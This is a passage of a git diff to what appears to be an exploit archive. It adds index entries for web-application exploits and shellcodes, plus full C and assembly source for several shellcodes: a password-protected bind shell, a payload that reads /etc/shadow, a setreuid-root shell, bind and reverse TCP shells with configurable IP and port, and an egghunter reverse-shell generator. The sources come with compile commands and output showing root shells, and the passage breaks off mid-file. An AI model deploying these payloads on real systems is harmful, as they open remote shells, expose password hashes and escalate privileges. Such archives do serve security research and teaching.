50240,exploits/php/webapps/50240.txt,"Projectsend r1295 - 'name' Stored XSS",1970-01-01,"Abdullah Kala",webapps,php,
+50241,exploits/aspx/webapps/50241.py,"Umbraco CMS 8.9.1 - Directory Traversal",1970-01-01,BitTheByte,webapps,aspx,
50242,exploits/php/webapps/50242.sh,"WordPress Plugin ProfilePress 3.1.3 - Privilege Escalation (Unauthenticated)",1970-01-01,"Numan Rajkotiya",webapps,php,
50243,exploits/java/webapps/50243.py,"Confluence Server 7.12.4 - 'OGNL injection' Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Fellipe Oliveira",webapps,java,
+50244,exploits/php/webapps/50244.py,"Traffic Offense Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Tagoletta,webapps,php,
50246,exploits/php/webapps/50246.txt,"WordPress Plugin Payments Plugin | GetPaid 2.4.6 - HTML Injection",1970-01-01,"Niraj Mahajan",webapps,php,
+50248,exploits/php/webapps/50248.txt,"Dolibarr ERP 14.0.1 - Privilege Escalation",1970-01-01,"Vishwaraj Bhattrai",webapps,php,
50249,exploits/php/webapps/50249.txt,"OpenSIS Community 8.0 - 'cp_id_miss_attn' SQL Injection",1970-01-01,"Eric Salario",webapps,php,
+50250,exploits/hardware/webapps/50250.txt,"Compro Technology IP Camera - 'killps.cgi' Denial of Service (DoS)",1970-01-01,icekam,webapps,hardware,
50251,exploits/hardware/webapps/50251.txt,"Compro Technology IP Camera - RTSP stream disclosure (Unauthenticated)",1970-01-01,icekam,webapps,hardware,
50252,exploits/hardware/webapps/50252.txt,"Compro Technology IP Camera - 'Multiple' Credential Disclosure",1970-01-01,icekam,webapps,hardware,
50253,exploits/hardware/webapps/50253.txt,"Compro Technology IP Camera - ' index_MJpeg.cgi' Stream Disclosure",1970-01-01,icekam,webapps,hardware,
@@ -44387,7 +44468,9 @@ id,file,description,date,author,type,platform,port
50356,exploits/php/webapps/50356.py,"Cmsimple 5.4 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,pussycat0x,webapps,php,
50357,exploits/php/webapps/50357.txt,"Pharmacy Point of Sale System 1.0 - 'Multiple' SQL Injection (SQLi)",1970-01-01,Murat,webapps,php,
50360,exploits/php/webapps/50360.txt,"Exam Form Submission System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Nitin Sharma",webapps,php,
+50361,exploits/php/webapps/50361.txt,"Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation",1970-01-01,"Cristian \'void\' Giustini",webapps,php,
50362,exploits/php/webapps/50362.txt,"Blood Bank System 1.0 - Authentication Bypass",1970-01-01,"Nitin Sharma",webapps,php,
+50363,exploits/php/webapps/50363.txt,"Phpwcms 1.9.30 - Arbitrary File Upload",1970-01-01,"Okan Kurtulus",webapps,php,
50364,exploits/php/webapps/50364.py,"Vehicle Service Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Ghuliev,webapps,php,
50365,exploits/php/webapps/50365.txt,"Dairy Farm Shop Management System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Sanjay Singh",webapps,php,
50366,exploits/multiple/webapps/50366.txt,"WhatsUpGold 21.0.3 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Andreas Finstad",webapps,multiple,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 90793a5b6..c126662e1 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -1025,9 +1025,21 @@ id,file,description,date,author,type,platform
48592,shellcodes/linux_x86/48592.c,"Linux/x86 - Disable ASLR Security + Polymorphic Shellcode (124 bytes)",1970-01-01,"Xenofon Vassilakopoulos",shellcode,linux_x86
48703,shellcodes/linux_x86/48703.c,"Linux/x86 - Egghunter (0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes)",1970-01-01,danf42,shellcode,linux_x86
48718,shellcodes/windows_x86/48718.c,"Windows/x86 - Download File (http://192.168.43.192:8080/9MKWaRO.hta) Via mshta Shellcode (100 bytes)",1970-01-01,"Siddharth Sharma",shellcode,windows_x86
+49466,shellcodes/windows_x86/49466.asm,"Windows/x86 - Download File (http://10.10.10.5:8080/2NWyfQ9T.hta) Via mshta + Execute + Stager Shellcode (143 bytes)",1970-01-01,"Armando Huesca Prida",shellcode,windows_x86
+49472,shellcodes/linux/49472.c,"Linux/x64 - Bind_tcp (0.0.0.0:4444) + Password (12345678) + Shell (/bin/sh) Shellcode (142 bytes)",1970-01-01,"Guillem Alminyana",shellcode,linux
+49547,shellcodes/linux_x86-64/49547.c,"Linux/x64 - execve _cat /etc/shadow_ Shellcode (66 bytes)",1970-01-01,"Felipe Winsnes",shellcode,linux_x86-64
+49592,shellcodes/windows_x86/49592.asm,"Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes)",1970-01-01,"Armando Huesca Prida",shellcode,windows_x86
49756,shellcodes/linux/49756.asm,"Linux/x64 - /sbin/halt -p Shellcode (51 bytes)",1970-01-01,"Chenthur Velan",shellcode,linux
49768,shellcodes/linux_x86/49768.c,"Linux/x86 - execve(/bin/sh) Shellcode (17 bytes)",1970-01-01,s1ege,shellcode,linux_x86
49770,shellcodes/linux_x86-64/49770.c,"Linux/x64 - execve(/bin/sh) Shellcode (21 bytes) (2)",1970-01-01,s1ege,shellcode,linux_x86-64
+49819,shellcodes/windows_x86-64/49819.c,"Windows/x64 - Dynamic Null-Free WinExec PopCalc Shellcode (205 Bytes)",1970-01-01,boku,shellcode,windows_x86-64
+49820,shellcodes/windows_x86-64/49820.c,"Windows/x64 - Dynamic NoNull Add RDP Admin (BOKU:SP3C1ALM0V3) Shellcode (387 Bytes)",1970-01-01,boku,shellcode,windows_x86-64
+49855,shellcodes/linux_x86/49855.c,"Linux/x86 - setreuid(0) + execve(_/bin/sh_) Shellcode (29 bytes)",1970-01-01,"Artur Szymczak",shellcode,linux_x86
49976,shellcodes/linux_x86/49976.c,"Linux/x86 - execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes_ xor encoded)",1970-01-01,d7x,shellcode,linux_x86
+50124,shellcodes/linux_x86/50124.c,"Linux/x86 - Bind (User Specified Port) Shell (/bin/sh) Shellcode (102 bytes)",1970-01-01,d7x,shellcode,linux_x86
+50125,shellcodes/linux_x86/50125.c,"Linux/x86 - Reverse (dynamic IP and port/TCP) Shell (/bin/sh) Shellcode (86 bytes)",1970-01-01,d7x,shellcode,linux_x86
+50141,shellcodes/linux_x86/50141.c,"Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode",1970-01-01,d7x,shellcode,linux_x86
50291,shellcodes/windows_x86-64/50291.c,"Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)",1970-01-01,"Xenofon Vassilakopoulos",shellcode,windows_x86-64
+50368,shellcodes/windows_x86/50368.c,"Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes)",1970-01-01,"Daniel Ortiz",shellcode,windows_x86
+50369,shellcodes/windows_x86/50369.c,"Windows/x86 - MessageBoxA PEB & Export Address Table NullFree/Dynamic Shellcode (230 bytes)",1970-01-01,"Daniel Ortiz",shellcode,windows_x86
50384,shellcodes/windows_x86/50384.c,"Windows/x86 - Bind TCP shellcode / Dynamic PEB & EDT method null-free Shellcode (415 bytes)",1970-01-01,"Daniel Ortiz",shellcode,windows_x86
diff --git a/shellcodes/linux/49472.c b/shellcodes/linux/49472.c
new file mode 100644
index 000000000..41cdf6982
--- /dev/null
+++ b/shellcodes/linux/49472.c
@@ -0,0 +1,107 @@
+/*
+ Exploit Title: Linux/x64 - Bind_tcp (0.0.0.0:4444) + Password (12345678) + Shell (/bin/sh) Shellcode (142 bytes)
+ Author: Guillem Alminyana
+ Date: 2021-01-18
+ Platform: GNU Linux x64
+ =====================================
+ Compile:
+ gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
+*/
+
+#include
+#include
+
+unsigned char code[]= \
+"\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x48\x31\xd2\x0f\x05\x50\x5f\x52\x52\x66\x68"
+"\x11\x5c\x66\x6a\x02\x6a\x31\x58\x54\x5e\xb2\x10\x0f\x05\x6a\x32\x58\x6a\x02\x5e"
+"\x0f\x05\x6a\x2b\x58\x48\x31\xf6\x99\x0f\x05\x50\x5f\x6a\x02\x5e\x6a\x21\x58\x0f"
+"\x05\x48\xff\xce\x79\xf6\x6a\x01\x58\x49\xb9\x50\x61\x73\x73\x77\x64\x3a\x20\x41"
+"\x51\x48\x89\xe6\x6a\x08\x5a\x0f\x05\x48\x31\xc0\x48\x83\xc6\x08\x0f\x05\x48\xb8"
+"\x31\x32\x33\x34\x35\x36\x37\x38\x56\x5f\x48\xaf\x75\x1c\x48\x31\xc0\x50\x48\xbb"
+"\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\x50\x54\x5a\x57\x54\x5e\x6a\x3b\x58"
+"\x0f\x05";
+
+void main()
+{
+ printf("ShellCode Lenght: %d\n", strlen(code));
+ int (*ret)() = (int(*)())code;
+ ret();
+}
+
+/*
+ ASM
+ 0: 6a 29 push 0x29
+ 2: 58 pop rax
+ 3: 6a 02 push 0x2
+ 5: 5f pop rdi
+ 6: 6a 01 push 0x1
+ 8: 5e pop rsi
+ 9: 48 31 d2 xor rdx,rdx
+ c: 0f 05 syscall
+ e: 50 push rax
+ f: 5f pop rdi
+ 10: 52 push rdx
+ 11: 52 push rdx
+ 12: 66 68 11 5c pushw 0x5c11
+ 16: 66 6a 02 pushw 0x2
+ 19: 6a 31 push 0x31
+ 1b: 58 pop rax
+ 1c: 54 push rsp
+ 1d: 5e pop rsi
+ 1e: b2 10 mov dl,0x10
+ 20: 0f 05 syscall
+ 22: 6a 32 push 0x32
+ 24: 58 pop rax
+ 25: 6a 02 push 0x2
+ 27: 5e pop rsi
+ 28: 0f 05 syscall
+ 2a: 6a 2b push 0x2b
+ 2c: 58 pop rax
+ 2d: 48 31 f6 xor rsi,rsi
+ 30: 99 cdq
+ 31: 0f 05 syscall
+ 33: 50 push rax
+ 34: 5f pop rdi
+ 35: 6a 02 push 0x2
+ 37: 5e pop rsi
+ 38: 6a 21 push 0x21
+ 3a: 58 pop rax
+ 3b: 0f 05 syscall
+ 3d: 48 ff ce dec rsi
+ 40: 79 f6 jns 38
+ 42: 6a 01 push 0x1
+ 44: 58 pop rax
+ 45: 49 b9 50 61 73 73 77 movabs r9,0x203a647773736150
+ 4c: 64 3a 20
+ 4f: 41 51 push r9
+ 51: 48 89 e6 mov rsi,rsp
+ 54: 6a 08 push 0x8
+ 56: 5a pop rdx
+ 57: 0f 05 syscall
+ 59: 48 31 c0 xor rax,rax
+ 5c: 48 83 c6 08 add rsi,0x8
+ 60: 0f 05 syscall
+ 62: 48 b8 31 32 33 34 35 movabs rax,0x3837363534333231
+ 69: 36 37 38
+ 6c: 56 push rsi
+ 6d: 5f pop rdi
+ 6e: 48 af scas rax,QWORD PTR es:[rdi]
+ 70: 75 1c jne 8e
+ 72: 48 31 c0 xor rax,rax
+ 75: 50 push rax
+ 76: 48 bb 2f 62 69 6e 2f movabs rbx,0x68732f2f6e69622f
+ 7d: 2f 73 68
+ 80: 53 push rbx
+ 81: 54 push rsp
+ 82: 5f pop rdi
+ 83: 50 push rax
+ 84: 54 push rsp
+ 85: 5a pop rdx
+ 86: 57 push rdi
+ 87: 54 push rsp
+ 88: 5e pop rsi
+ 89: 6a 3b push 0x3b
+ 8b: 58 pop rax
+ 8c: 0f 05 syscall
+
+*/
\ No newline at end of file
diff --git a/shellcodes/linux_x86-64/49547.c b/shellcodes/linux_x86-64/49547.c
new file mode 100644
index 000000000..a9ff714da
--- /dev/null
+++ b/shellcodes/linux_x86-64/49547.c
@@ -0,0 +1,63 @@
+# Exploit Title: Linux/x64 - execve "cat /etc/shadow" Shellcode (66 bytes)
+# Date: 02-08-2021
+# Author: Felipe Winsnes
+# Tested on: Debian x64
+# Shellcode Length: 66
+
+/*
+global _start
+
+_start:
+
+ xor rax, rax ; Zeroes out RAX.
+ xor rbp, rbp ; Zeroes out RBP.
+
+ push rax ; Pushes RAX's NULL-DWORD.
+
+ mov rbp, 0x776f646168732f63 ; Moves value "wodahs/c" into RBP.
+ push rbp ; Pushes the vaueof RBP into the Stack.
+
+ mov rbp, 0x74652f2f2f2f2f2f ; Moves value "te//////" into RBP.
+ push rbp ; Pushes the vaue of RBP into the Stack.
+
+ mov rbp, rsp ; Copies the value of the Stack into RBP.
+ push rax ; Pushes RAX's NULL-DWORD.
+
+ mov rbx, 0x7461632f6e69622f ; Moves value "tac/nib/" into RBX.
+ push rbx ; Pushes the vaue of RBX into the Stack.
+
+ mov rbx, rsp ; Copies the value of the Stack into RBX.
+
+ mov rdi, rsp ; Copies the value of the Stack into RDI.
+ push rax ; Pushes RAX's NULL-DWORD.
+
+ mov rdx, rsp ; Copies the value of the Stack into RDX. As the previous DWORD was completely NULL, RDX is set to 0.
+
+ push rbp ; Pushes the vaue of RBP into the Stack.
+ push rbx ; Pushes the vaue of RBX into the Stack. The full string should be "cat /etc/shadow".
+
+ mov rsi, rsp ; Copies this entire string from the Stack into RSI.
+
+ push word 59 ; Pushes the value 59 (syscall value for execve in the x64 format).
+ pop ax ; Pops this value into AX so there are no NULLs.
+ syscall ; The syscall is executed.
+*/
+
+
+/*
+Usage:
+whitecr0wz@SLAE64:~/assembly/execve/cat$ gcc cat_shadow.c -o cat_shadow -fno-stack-protector -z execstack -w
+whitecr0wz@SLAE64:~/assembly/execve/cat$ ./cat_shadow
+*/
+
+#include
+
+unsigned char shellcode[] = \
+"\x48\x31\xc0\x48\x31\xed\x50\x48\xbd\x63\x2f\x73\x68\x61\x64\x6f\x77\x55\x48\xbd\x2f\x2f\x2f\x2f\x2f\x2f\x65\x74\x55\x48\x89\xe5\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x63\x61\x74\x53\x48\x89\xe3\x48\x89\xe7\x50\x48\x89\xe2\x55\x53\x48\x89\xe6\x66\x6a\x3b\x66\x58\x0f\x05";
+
+int main()
+{
+
+ int (*ret)() = (int(*)())shellcode;
+ ret();
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/49855.c b/shellcodes/linux_x86/49855.c
new file mode 100644
index 000000000..def98129a
--- /dev/null
+++ b/shellcodes/linux_x86/49855.c
@@ -0,0 +1,41 @@
+/*
+ Author: Artur [ajes] Szymczak (2021)
+ Function: Linux x86 shellcode, setreuid to 0 and then execute /bin/sh
+ Size: 29 bytes
+
+ Testing:
+
+$ gcc -fno-stack-protector -z execstack shellcode_tester.c -o shellcode
+shellcode_tester.c: In function ‘main’:
+shellcode_tester.c:25:2: warning: incompatible implicit declaration of built-in function ‘printf’ [enabled by default]
+shellcode_tester.c:25:24: warning: incompatible implicit declaration of built-in function ‘strlen’ [enabled by default]
+$ sudo chown root:root ./shellcode
+$ sudo chmod u+s ./shellcode
+$ ./shellcode
+Length: 29
+# id
+uid=0(root) gid=1000(artur) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),111(lpadmin),112(sambashare),1000(artur)
+
+*/
+
+char shellcode[] = ""
+ "\x31\xc0" // clear eax, as we don't know its state
+ "\xb0\x46" // syscall setreuid
+ "\x31\xdb" // real user ID = 0
+ "\x31\xc9" // effective user ID = 0
+ "\x99" // saved set-user-ID = 0 (using EDX)
+ "\xcd\x80" // call it
+
+ "\x96" // clear eax, as we don't know its state after former syscall
+ "\xb0\x0b" // syscall execve
+ "\x53" // NULL string terminator
+ "\x68\x2f\x2f\x73\x68" // //sh
+ "\x68\x2f\x62\x69\x6e" // /bin
+ "\x89\xe3" // pointer to above string - path to the program to execve
+ "\xcd\x80"; // call it
+
+void main(void)
+{
+ printf("Length: %d\n",strlen(shellcode));
+ ((void(*)(void))shellcode)();
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/50124.c b/shellcodes/linux_x86/50124.c
new file mode 100644
index 000000000..84bdb96f7
--- /dev/null
+++ b/shellcodes/linux_x86/50124.c
@@ -0,0 +1,195 @@
+# Exploit Title: Linux/x86 - Bind (User Specified Port) Shell (/bin/sh) Shellcode (102 bytes)
+# Date: 08/07/2021
+# Exploit Author: d7x
+# Tested on: Ubuntu x86
+
+/***
+ Linux/x86 Bind Shell (/bin/sh) with dynamic port binding Null-Free Shellcode (102 bytes)
+ Usage: gcc -z execstack -o bindshell bindshell.c
+ ./bindshell 7000
+ Binding to 7000 (0x1b58)
+
+ netstat -antlp | grep 7000
+ tcp 0 0 0.0.0.0:7000 0.0.0.0:* LISTEN 26088/bindshell
+ nc -nv 127.0.0.1 7000
+ Connection to 127.0.0.1 7000 port [tcp/*] succeeded!
+ id
+ uid=0(root) gid=0(root) groups=0(root)
+
+ *** Created by d7x
+ https://d7x.promiselabs.net
+ https://www.promiselabs.net ***
+***/
+
+
+#include
+#include
+
+unsigned char shellcode[] = \
+"\x31\xc0\x31\xdb\xb0\x66\xb3\x01\x31\xd2\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x02\x52\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x52\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x56\x89\xe1\xcd\x80\x89\xc6\x31\xc9\xb0\x3f\x89\xf3\xcd\x80\xfe\xc1\x66\x83\xf9\x02\x7e\xf2\x31\xc0\x50\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80";
+
+main(int argc, char *argv[])
+{
+
+ /* Default port at 28th and 29th byte index: \x11\x5c */
+
+ // in case no port is provided the default would be used
+ if (argc < 2) {
+ printf("No port provided, 4444 (0x115c will be used)\n");
+ }
+ else
+ {
+
+ int port = atoi(argv[1]);
+ printf("Binding to %d (0x%x)\n", port, port);
+
+ unsigned int p1 = (port >> 8) & 0xff;
+ unsigned int p2 = port & 0xff;
+ // printf("%x %x\n", p1, p2);
+
+ shellcode[28] = (unsigned char){p1};
+ shellcode[29] = (unsigned char){p2};
+
+ // printf("%x %x", shellcode[28], shellcode[29]);
+}
+
+ int (*ret)() = (int(*)())shellcode;
+
+ ret();
+
+}
+
+/***
+; shellcode assembly
+
+
+global _start:
+
+section .text
+
+_start:
+; socketcall (0x66)
+; syscall SYS_SOCKET (0x01) - int socket(int domain, int type, int protocol);
+xor eax, eax
+xor ebx, ebx
+mov al, 0x66
+mov bl, 0x01
+
+; pushing arguments to the stack backwards: int protocol (PF_INET, SOCK_STREAM, 0)
+xor edx, edx
+push edx ; int domain
+
+push 0x01 ; SOCK_STREAM
+push 0x02 ; PF_INET (AF_INET and PF_INET is the same)
+
+mov ecx, esp
+
+; syscall
+int 0x80
+
+; save returned file descriptor from eax into esi for later use
+mov esi, eax
+
+; socketcall (0x66)
+; syscall BIND (0x02) - int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
+mov al, 0x66
+mov bl, 0x02
+
+; pushing arguments to the stack backwards:
+; bind(sockid, (struct sockaddr *) &addrport, sizeof(addrport));
+
+; xor edx, edx
+push edx
+push word 0x5c11 ; port 4444
+push word 0x02 ; PF_INET
+
+mov ecx, esp
+
+push 0x10 ; sockaddr length
+push ecx ; sockaddr pointer
+push esi ; saved socket descriptor
+
+mov ecx, esp
+
+; syscall
+int 0x80
+
+; socketcall (0x66)
+; syscall SYS_LISTEN (0x04) - int listen(int sockfd, int backlog);
+mov al, 0x66
+mov bl, 0x04
+
+; pushing arguments to the stack backwards:
+; listen(sockid, 0);
+push edx ; push 0
+
+push esi ; socket file descriptor saved earlier in esi
+
+mov ecx, esp
+
+; syscall
+int 0x80
+
+; socketcall (0x66)
+; syscall SYS_ACCEPT (0x05) - int sock_accept = accept(sockid, 0, 0);
+mov al, 0x66
+mov bl, 0x05
+
+push edx
+push esi ; socket file descriptor saved earlier in esi
+mov ecx, esp
+
+; syscall
+int 0x80
+
+; save returned file descriptor from eax into esi for later use
+mov esi, eax
+
+; dup2 (0x3f)
+; 0 ; stdin
+
+; dup2 (0x3f)
+; 1 ; stdout
+
+; dup2 (0x3f)
+; 2 ; stderr
+; let's put all this in a loop
+xor ecx, ecx
+
+DUPCOUNT:
+; (0 - stdin, 1 - stdout, 2 - stderr) dup2 - __NR_dup2 63
+; int dup2(int oldfd, int newfd);
+
+; xor eax, eax
+mov al, 0x3f
+
+; ebx (socket descriptor, being copied over from esi saved earlier)
+; ecx will be calculated automatically based on the loop value
+mov ebx, esi ; saved socket descriptor
+
+; syscall
+int 0x80
+
+inc cl
+cmp cx, 2
+jle DUPCOUNT ; count until 2 is reached
+
+
+; execve (0x0b)
+; /bin//sh
+xor eax, eax
+; xor ebx, ebx
+; sub esp, 8 ; reserve some bytes in the stack to work with
+push eax ; substituted sub esp, 8 to reduce opcode size
+
+mov al, 0x0b
+push 0x68732f2f ; //sh
+push 0x6e69622f ; /bin
+mov ebx, esp
+
+xor ecx, ecx
+
+; syscall
+int 0x80
+
+***/
\ No newline at end of file
diff --git a/shellcodes/linux_x86/50125.c b/shellcodes/linux_x86/50125.c
new file mode 100644
index 000000000..6a83d6be5
--- /dev/null
+++ b/shellcodes/linux_x86/50125.c
@@ -0,0 +1,174 @@
+# Exploit Title: Linux/x86 - Reverse (dynamic IP and port/TCP) Shell (/bin/sh) Shellcode (86 bytes)
+# Date: 10/07/2021
+# Exploit Author: d7x
+# Tested on: Ubuntu x86
+
+/***
+ Linux/x86 Reverse TCP Shell with dynamic IP and port binding Shellcode (tested on Ubuntu 12.04 LTS)
+ Usage: gcc -z execstack -o shell_reverse_tcp shell_reverse_tcp.c
+ $ ./shell_reverse_tcp_shellcode 192.168.1.137 4444
+ Connecting to 192.168.1.236 (0xec01a8c0):4444 (0x115c)
+ Byte 26: c0
+ Byte 27: a8
+ Byte 28: 01
+ Byte 29: ec
+
+ $ nc -nlv 4444
+ Listening on 0.0.0.0 4444
+ Connection received on 192.168.1.137 45219
+ id
+ uid=0(root) gid=0(root) groups=0(root)
+
+ *** Created by d7x
+ https://d7x.promiselabs.net
+ https://www.promiselabs.net ***
+***/
+
+#include
+#include
+#include
+
+unsigned char shellcode[] = \
+"\x31\xc0\x31\xdb\xb0\x66\xb3\x01\x31\xd2\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x03\x68\x7f\x01\x01\x01\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x31\xc9\x31\xc0\xb0\x3f\x89\xf3\xcd\x80\xfe\xc1\x66\x83\xf9\x02\x7e\xf0\x31\xc0\x50\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"; //IP address at 26th byte; Port at 32nd byte
+
+main(int argc, char *argv[])
+{
+
+ /* Default IP and port at 26th and 32nd byte index: \x7f\x01\x01\x01 \x11\x5c */
+
+ // in case no port is provided the default would be used
+ if (argc < 3) {
+ printf("No IP or port provided, 127.1.1.1:4444 (0x7f010101:0x115c) will be used\n");
+ }
+ else
+ {
+
+ // convert IP address to binary representation and store in ipaddr.sin_addr.s_addr
+ struct sockaddr_in ipaddr;
+ inet_aton(argv[1], &ipaddr.sin_addr.s_addr);
+
+ int port = atoi(argv[2]);
+ printf("Connecting to %s (0x%x):%d (0x%x)\n", argv[1], ipaddr.sin_addr.s_addr, port, port);
+
+ unsigned int p1 = (port >> 8) & 0xff;
+ unsigned int p2 = port & 0xff;
+ // printf("%x %x\n", p1, p2);
+
+ shellcode[32] = (unsigned char){p1};
+ shellcode[33] = (unsigned char){p2};
+
+ /* 1st byte: 0xAABBCCDD >> 0 & 0xff
+ 2nd byte: 0xAABBCCDD >> 8 & 0xff
+ 3rd byte: 0xAABBCCDD >> 16 & 0xff
+ 4th byte: 0xAABBCCDD >> 24 & 0xff
+ */
+
+ int i, a;
+ for (i = 26, a = 0; i <= 29; i++, a+=8)
+ {
+ shellcode[i] = (ipaddr.sin_addr.s_addr >> a) & 0xff ;
+ printf("Byte %d: %.02x\n", i, shellcode[i]);
+ }
+ }
+
+ int (*ret)() = (int(*)())shellcode;
+
+ ret();
+
+}
+
+/***
+; shellcode assembly
+
+global _start:
+
+section .text
+
+_start:
+; socketcall (0x66)
+; syscall SYS_SOCKET (0x01) - int socket(int domain, int type, int protocol);
+xor eax, eax
+xor ebx, ebx
+mov al, 0x66
+mov bl, 0x01
+
+; pushing arguments to the stack backwards: int protocol (PF_INET, SOCK_STREAM, 0)
+xor edx, edx
+push edx ; int domain
+
+push 0x01 ; SOCK_STREAM
+push 0x02 ; PF_INET (AF_INET and PF_INET is the same)
+
+mov ecx, esp
+
+; syscall
+int 0x80
+
+; save returned file descriptor from eax into esi for later use
+mov esi, eax
+
+; socketcall (0x66)
+; syscall SYS_CONNECT (0x03) - int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
+mov al, 0x66
+mov bl, 0x03
+
+; pushing arguments to the stack backwards:
+; connect(sockid, (struct sockaddr *) &addrport, sizeof(addrport));
+
+push 0x0101017f ; 127.1.1.1
+push word 0x5c11 ; port 4444
+push word 0x02 ; PF_INET
+
+mov ecx, esp
+
+push 0x10 ; sockaddr length
+push ecx ; sockaddr pointer
+push esi ; saved socket descriptor
+
+mov ecx, esp
+
+; syscall
+int 0x80
+
+
+; dup2 - __NR_dup2 63
+; dup2(0), dup2(1), dup2(2)
+; (0 - stdin, 1 - stdout, 2 - stderr)
+
+; let's put all this in a loop
+xor ecx, ecx
+
+DUPCOUNT:
+; int dup2(int oldfd, int newfd);
+xor eax, eax
+mov al, 0x3f
+
+; ebx (socket descriptor, being copied over from esi saved earlier)
+; ecx will be calculated automatically based on the loop value
+
+; xor ebx, ebx
+mov ebx, esi ; saved socket descriptor
+; syscall
+int 0x80
+
+inc cl
+cmp cx, 2
+jle DUPCOUNT ; count until 2 is reached
+
+
+; execve (0x0b)
+; /bin//sh
+xor eax, eax
+; xor ebx, ebx
+push eax ; reserve some bytes in the stack to work with
+
+mov al, 0x0b
+push 0x68732f2f ; //sh
+push 0x6e69622f ; /bin
+mov ebx, esp
+
+xor ecx, ecx
+
+; syscall
+int 0x80
+***/
\ No newline at end of file
diff --git a/shellcodes/linux_x86/50141.c b/shellcodes/linux_x86/50141.c
new file mode 100644
index 000000000..c00f24975
--- /dev/null
+++ b/shellcodes/linux_x86/50141.c
@@ -0,0 +1,214 @@
+# Exploit Title: Linux/x86 - Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode
+# Date: 18/07/2021
+# Exploit Author: d7x
+# Tested on: Ubuntu x86
+
+/***
+Linux/x86 - Egghunter Reverse TCP Shell Shellcode Generator with dynamic IP and port Shellcode
+Author: d7x
+https://d7x.promiselabs.net/
+https://www.promiselabs.net/
+***/
+
+/*
+ Egghunter payloads from skape modified to work on a modern up to date architecture
+ For detailed information on the egghunter payloads and egghunter research refer to the original whitepaper by skape:
+ Safely Searching Process Virtual Address Space http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
+ Example usage of egghunters https://www.fuzzysecurity.com/tutorials/expDev/4.html
+*/
+
+/* Usage: $ gcc -fno-stack-protector -z execstack -o egghunter egghunter_shellcode.c
+ $ ./egghunter 2 3d7xC0D3 192.168.1.137 6666 # This will output AND execute the egghunter! (if you get a seg fault/core dumped error either your shellcode output contains null bytes or you have no idea what you are doing)
+*/
+
+#include
+#include
+#include
+
+void PrintShellcode(unsigned char* s);
+void change_shellcode_bytes(unsigned char shellcode[], int offset, int n, unsigned char new[]);
+unsigned char* ConvertStrToHex(unsigned char* s);
+
+unsigned char egghunter[][200] = { \
+{"\xBB\x90\x50\x90\x50\x31\xC9\xF7\xE1\x66\x81\xCA\xFF\x0F\x42\x60\x8D\x5A\x04\xB0\x21\xCD\x80\x3C\xF2\x61\x74\xED\x39\x1A\x75\xEE\x39\x5A\x04\x75\xE9\xFF\xE2"}, // access method - 39 bytes
+{"\x31\xC9\x31\xD2\x66\x81\xCA\xFF\x0F\x42\x8D\x5A\x04\x6A\x21\x58\xCD\x80\x3C\xF2\x74\xEE\xB8\x90\x50\x90\x50\x89\xD7\xAF\x75\xE9\xAF\x75\xE6\xFF\xE7"}, //access revisited (fixed) - 37 bytes
+{"\x31\xC9\x66\x81\xC9\xFF\x0F\x41\x6A\x43\x58\xCD\x80\x3C\xF2\x74\xF1\xB8\x90\x50\x90\x50\x89\xCF\xAF\x75\xEC\xAF\x75\xE9\xFF\xE7"} //sigaction method (fixed) - 32 bytes
+};
+
+/* unsigned char egghunter[] = \
+"\x31\xC9\x66\x81\xC9\xFF\x0F\x41\x6A\x43\x58\xCD\x80\x3C\xF2\x74\xF1\xB8\x90\x50\x90\x50\x89\xCF\xAF\x75\xEC\xAF\x75\xE9\xFF\xE7"; //sigaction method (fixed) - 32 bytes
+//"\x66\x81\xC9\xFF\x0F\x41\x6A\x43\x58\xCD\x80\x3C\xF2\x74\xF1\xB8\x90\x50\x90\x50\x89\xCF\xAF\x75\xEC\xAF\x75\xE9\xFF\xE7"; //sigaction method (original version by skape - 30 bytes)
+//"\x31\xC9\x31\xD2\x66\x81\xCA\xFF\x0F\x42\x8D\x5A\x04\x6A\x21\x58\xCD\x80\x3C\xF2\x74\xEE\xB8\x90\x50\x90\x50\x89\xD7\xAF\x75\xE9\xAF\x75\xE6\xFF\xE7"; //access revisited (fixed) - 37 bytes
